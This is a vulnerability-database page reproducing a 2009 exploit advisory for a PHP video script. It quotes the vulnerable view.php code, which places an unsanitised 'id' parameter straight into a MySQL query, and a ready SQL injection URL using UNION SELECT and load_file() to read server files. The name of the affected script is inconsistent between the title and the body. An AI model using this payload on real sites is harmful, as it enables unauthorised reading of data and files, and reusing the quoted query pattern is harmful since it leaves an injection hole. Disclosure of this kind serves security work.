Lucene search
K

SurfMyTV Script 1.0 SQL Injection

🗓️ 25 Mar 2009 00:00:00Reported by X0rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

SurfMyTV Script 1.0 SQL Injection vulnerability in view.ph

Code
`#########################################################################################  
[0x01] Informations:  
Name : Media Entertainment Script 1.0  
Download : http://www.hotscripts.com/listings/jump/download/89424/  
Vulnerability : Sql Injection To Lfi  
Author : x0r  
Contact : [email protected]  
Notes : Proud To Be Italian  
Greetz : //  
#########################################################################################  
[0x02] Bug:  
Bugged file is /[path]/view.php  
[code]  
$id = $_GET['id'];  
$v = mysql_fetch_array(mysql_query("SELECT id,views,title FROM videos WHERE id='$id'"));  
[/code]  
#########################################################################################  
[0x03] Exploit:  
1- http://victim.it/path/view.php?id=-1' union select 0,0,0,load_file('lf'),0,0,0--  
########################################################################################  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation